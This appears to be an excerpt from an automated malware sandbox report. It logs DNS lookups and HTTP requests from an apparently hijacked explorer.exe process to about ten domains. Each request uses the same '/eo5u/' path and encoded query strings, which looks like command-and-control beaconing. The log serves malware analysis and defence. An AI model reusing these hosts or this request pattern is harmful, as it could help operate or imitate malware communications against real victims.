                                                                                                  Jun 15, 2021 14:00:53.029082060 CEST6026153192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:00:53.059952021 CEST53602618.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:00:53.756407976 CEST5606153192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:00:53.783242941 CEST53560618.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:00:54.701206923 CEST5833653192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:00:54.731323004 CEST53583368.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:00:55.635351896 CEST5378153192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:00:55.659615040 CEST53537818.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:00:56.541476965 CEST5406453192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:00:56.571630001 CEST53540648.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:00:57.244889021 CEST5281153192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:00:57.269438028 CEST53528118.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:00:58.078836918 CEST5529953192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:00:58.111869097 CEST53552998.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:00:58.948852062 CEST6374553192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:00:58.980463982 CEST53637458.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:00:59.917323112 CEST5005553192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:00:59.950736046 CEST53500558.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:01:00.719428062 CEST6137453192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:01:00.746390104 CEST53613748.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:01:01.780704975 CEST5033953192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:01:01.808017015 CEST53503398.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:01:20.379822969 CEST6330753192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:01:20.416636944 CEST53633078.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:01:41.290292978 CEST4969453192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:01:41.414689064 CEST53496948.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:01:41.877266884 CEST5498253192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:01:41.914093018 CEST53549828.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:01:42.458127022 CEST5001053192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:01:42.645826101 CEST53500108.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:01:42.894589901 CEST6371853192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:01:42.934976101 CEST53637188.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:01:43.071845055 CEST6211653192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:01:43.105573893 CEST53621168.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:01:43.359158039 CEST6381653192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:01:43.383184910 CEST53638168.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:01:43.935910940 CEST5501453192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:01:43.974392891 CEST53550148.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:01:44.580919027 CEST6220853192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:01:44.615020037 CEST53622088.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:01:45.010164976 CEST5757453192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:01:45.043171883 CEST53575748.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:01:46.091872931 CEST5181853192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:01:46.132911921 CEST53518188.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:01:47.089246035 CEST5662853192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:01:47.125475883 CEST53566288.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:01:47.660451889 CEST6077853192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:01:47.693706036 CEST53607788.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:02:01.826809883 CEST5379953192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:02:01.866808891 CEST53537998.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:02:16.523538113 CEST5468353192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:02:16.561350107 CEST53546838.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:02:21.781806946 CEST5932953192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:02:21.822328091 CEST53593298.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:02:26.256181955 CEST6402153192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:02:26.297524929 CEST53640218.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:02:27.030931950 CEST5612953192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:02:27.070199013 CEST53561298.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:02:30.684113979 CEST5817753192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:02:30.719409943 CEST53581778.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:02:32.609267950 CEST5070053192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:02:32.644678116 CEST53507008.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:02:32.815218925 CEST5406953192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:02:33.026951075 CEST53540698.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:02:38.040509939 CEST6117853192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:02:38.388204098 CEST53611788.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:02:43.402905941 CEST5701753192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:02:43.530714035 CEST53570178.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:02:48.914489985 CEST5632753192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:02:48.954250097 CEST53563278.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:02:54.491319895 CEST5024353192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:02:54.531989098 CEST53502438.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:02:59.686495066 CEST6205553192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:03:00.042175055 CEST53620558.8.8.8192.168.2.6
                                                                                                  Jun 15, 2021 14:03:05.631640911 CEST6124953192.168.2.68.8.8.8
                                                                                                  Jun 15, 2021 14:03:05.898955107 CEST53612498.8.8.8192.168.2.6

                                                                                                  DNS Queries

                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                  Jun 15, 2021 14:02:16.523538113 CEST192.168.2.68.8.8.80xe336Standard query (0)www.csmserver.comA (IP address)IN (0x0001)
                                                                                                  Jun 15, 2021 14:02:21.781806946 CEST192.168.2.68.8.8.80xda5eStandard query (0)www.virtualpaycards.comA (IP address)IN (0x0001)
                                                                                                  Jun 15, 2021 14:02:27.030931950 CEST192.168.2.68.8.8.80x305dStandard query (0)www.activedevon.xyzA (IP address)IN (0x0001)
                                                                                                  Jun 15, 2021 14:02:32.815218925 CEST192.168.2.68.8.8.80xb791Standard query (0)www.rainmiser.comA (IP address)IN (0x0001)
                                                                                                  Jun 15, 2021 14:02:38.040509939 CEST192.168.2.68.8.8.80xa805Standard query (0)www.booty1fitness.comA (IP address)IN (0x0001)
                                                                                                  Jun 15, 2021 14:02:43.402905941 CEST192.168.2.68.8.8.80x3bb6Standard query (0)www.fitnesstower.netA (IP address)IN (0x0001)
                                                                                                  Jun 15, 2021 14:02:48.914489985 CEST192.168.2.68.8.8.80xc4abStandard query (0)www.astrobalajichennai.comA (IP address)IN (0x0001)
                                                                                                  Jun 15, 2021 14:02:54.491319895 CEST192.168.2.68.8.8.80xd7ceStandard query (0)www.oruiz.servicesA (IP address)IN (0x0001)
                                                                                                  Jun 15, 2021 14:02:59.686495066 CEST192.168.2.68.8.8.80x7178Standard query (0)www.mirwanonline.comA (IP address)IN (0x0001)
                                                                                                  Jun 15, 2021 14:03:05.631640911 CEST192.168.2.68.8.8.80x897Standard query (0)www.kslobon.comA (IP address)IN (0x0001)

                                                                                                  DNS Answers

                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                  Jun 15, 2021 14:02:16.561350107 CEST8.8.8.8192.168.2.60xe336No error (0)www.csmserver.com75.2.26.18A (IP address)IN (0x0001)
                                                                                                  Jun 15, 2021 14:02:16.561350107 CEST8.8.8.8192.168.2.60xe336No error (0)www.csmserver.com99.83.153.108A (IP address)IN (0x0001)
                                                                                                  Jun 15, 2021 14:02:21.822328091 CEST8.8.8.8192.168.2.60xda5eNo error (0)www.virtualpaycards.com75.2.26.18A (IP address)IN (0x0001)
                                                                                                  Jun 15, 2021 14:02:21.822328091 CEST8.8.8.8192.168.2.60xda5eNo error (0)www.virtualpaycards.com99.83.153.108A (IP address)IN (0x0001)
                                                                                                  Jun 15, 2021 14:02:27.070199013 CEST8.8.8.8192.168.2.60x305dNo error (0)www.activedevon.xyzparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                                                                  Jun 15, 2021 14:02:27.070199013 CEST8.8.8.8192.168.2.60x305dNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                                                                  Jun 15, 2021 14:02:27.070199013 CEST8.8.8.8192.168.2.60x305dNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                                                                  Jun 15, 2021 14:02:27.070199013 CEST8.8.8.8192.168.2.60x305dNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                                                                  Jun 15, 2021 14:02:27.070199013 CEST8.8.8.8192.168.2.60x305dNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                                                                  Jun 15, 2021 14:02:27.070199013 CEST8.8.8.8192.168.2.60x305dNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                                                                  Jun 15, 2021 14:02:27.070199013 CEST8.8.8.8192.168.2.60x305dNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                                                                  Jun 15, 2021 14:02:27.070199013 CEST8.8.8.8192.168.2.60x305dNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                                                                  Jun 15, 2021 14:02:33.026951075 CEST8.8.8.8192.168.2.60xb791Name error (3)www.rainmiser.comnonenoneA (IP address)IN (0x0001)
                                                                                                  Jun 15, 2021 14:02:38.388204098 CEST8.8.8.8192.168.2.60xa805Server failure (2)www.booty1fitness.comnonenoneA (IP address)IN (0x0001)
                                                                                                  Jun 15, 2021 14:02:43.530714035 CEST8.8.8.8192.168.2.60x3bb6No error (0)www.fitnesstower.net98.124.204.16A (IP address)IN (0x0001)
                                                                                                  Jun 15, 2021 14:02:48.954250097 CEST8.8.8.8192.168.2.60xc4abNo error (0)www.astrobalajichennai.comastrobalajichennai.comCNAME (Canonical name)IN (0x0001)
                                                                                                  Jun 15, 2021 14:02:48.954250097 CEST8.8.8.8192.168.2.60xc4abNo error (0)astrobalajichennai.com166.62.28.135A (IP address)IN (0x0001)
                                                                                                  Jun 15, 2021 14:02:54.531989098 CEST8.8.8.8192.168.2.60xd7ceNo error (0)www.oruiz.servicesoruiz.servicesCNAME (Canonical name)IN (0x0001)
                                                                                                  Jun 15, 2021 14:02:54.531989098 CEST8.8.8.8192.168.2.60xd7ceNo error (0)oruiz.services34.102.136.180A (IP address)IN (0x0001)
                                                                                                  Jun 15, 2021 14:03:00.042175055 CEST8.8.8.8192.168.2.60x7178No error (0)www.mirwanonline.commirwanonline.comCNAME (Canonical name)IN (0x0001)
                                                                                                  Jun 15, 2021 14:03:00.042175055 CEST8.8.8.8192.168.2.60x7178No error (0)mirwanonline.com45.130.231.56A (IP address)IN (0x0001)
                                                                                                  Jun 15, 2021 14:03:05.898955107 CEST8.8.8.8192.168.2.60x897No error (0)www.kslobon.com45.194.179.179A (IP address)IN (0x0001)

                                                                                                  HTTP Request Dependency Graph

                                                                                                  • www.csmserver.com
                                                                                                  • www.virtualpaycards.com
                                                                                                  • www.activedevon.xyz
                                                                                                  • www.fitnesstower.net
                                                                                                  • www.astrobalajichennai.com
                                                                                                  • www.oruiz.services
                                                                                                  • www.mirwanonline.com

                                                                                                  HTTP Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  0192.168.2.64974275.2.26.1880C:\Windows\explorer.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  Jun 15, 2021 14:02:16.588711023 CEST6557OUTGET /eo5u/?3flLi=3fixF&WDH4Z=0tmYgKUoP8HBZJPHrN3mEpntgEeg92lG9aPAPT1lmhriAZaUzsP0gPfGme0eRnFww8h1H8FnKQ== HTTP/1.1
                                                                                                  Host: www.csmserver.com
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                  Jun 15, 2021 14:02:16.768151999 CEST6557INHTTP/1.1 403 Forbidden
                                                                                                  Server: awselb/2.0
                                                                                                  Date: Tue, 15 Jun 2021 12:02:16 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 118
                                                                                                  Connection: close
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  1192.168.2.64974375.2.26.1880C:\Windows\explorer.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  Jun 15, 2021 14:02:21.840915918 CEST6558OUTGET /eo5u/?WDH4Z=e/xZClE2gqW11N5mIdfQbGNamif3pkKFLmA6EuyQzIHsEAjXCN6/9/EgTPNIZMvp3EoPPaqfFA==&3flLi=3fixF HTTP/1.1
                                                                                                  Host: www.virtualpaycards.com
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                  Jun 15, 2021 14:02:22.019643068 CEST6558INHTTP/1.1 403 Forbidden
                                                                                                  Server: awselb/2.0
                                                                                                  Date: Tue, 15 Jun 2021 12:02:21 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 118
                                                                                                  Connection: close
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  2192.168.2.649747198.54.117.21880C:\Windows\explorer.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  Jun 15, 2021 14:02:27.242146969 CEST6568OUTGET /eo5u/?3flLi=3fixF&WDH4Z=gO4K5mHcn2QPYGRvxafNe+5p9r0cfSpdBn55FnpuS2mPyHUUFTjtXKJi1XneNJcm9Y4m6sLWag== HTTP/1.1
                                                                                                  Host: www.activedevon.xyz
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  3192.168.2.64975098.124.204.1680C:\Windows\explorer.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  Jun 15, 2021 14:02:43.707983017 CEST6589OUTGET /eo5u/?WDH4Z=yxHfGUFjXEGKKHe496T5QQpeNFyvG4o9Xb/7GVQTfhZwVL2GTV3Bu5rpqIAUlpPtd3oFrC0Mdg==&3flLi=3fixF HTTP/1.1
                                                                                                  Host: www.fitnesstower.net
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                  Jun 15, 2021 14:02:43.883925915 CEST6590INHTTP/1.1 404 Not Found
                                                                                                  Content-Type: text/html
                                                                                                  Server: Microsoft-IIS/8.5
                                                                                                  X-Powered-By: ASP.NET
                                                                                                  Date: Tue, 15 Jun 2021 12:02:43 GMT
                                                                                                  Connection: close
                                                                                                  Content-Length: 1245
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65
                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name change
                                                                                                  Jun 15, 2021 14:02:43.883958101 CEST6590INData Raw: 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d
                                                                                                  Data Ascii: d, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  4192.168.2.649751166.62.28.13580C:\Windows\explorer.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  Jun 15, 2021 14:02:49.214734077 CEST6591OUTGET /eo5u/?3flLi=3fixF&WDH4Z=ZNZ/xCb0AByMrT84YN+VaRUJuS/eLDsmfKlk5YP3EjsgSpc8R3rmuTDGRlyYjyOH7itkGMLpMQ== HTTP/1.1
                                                                                                  Host: www.astrobalajichennai.com
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                  Jun 15, 2021 14:02:49.483886003 CEST6592INHTTP/1.1 404 Not Found
                                                                                                  Date: Tue, 15 Jun 2021 12:02:49 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Length: 315
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  5192.168.2.64975234.102.136.18080C:\Windows\explorer.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  Jun 15, 2021 14:02:54.552081108 CEST6592OUTGET /eo5u/?WDH4Z=gZFKoILzQUaYoLKingixYHxTjCf2oStQNi0AvXN4/YVm/R1ciwnO5FzTPL9EI6/IQBok7I5ryQ==&3flLi=3fixF HTTP/1.1
                                                                                                  Host: www.oruiz.services
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                  Jun 15, 2021 14:02:54.665734053 CEST6593INHTTP/1.1 403 Forbidden
                                                                                                  Server: openresty
                                                                                                  Date: Tue, 15 Jun 2021 12:02:54 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 275
                                                                                                  ETag: "60c7be6a-113"
                                                                                                  Via: 1.1 google
                                                                                                  Connection: close
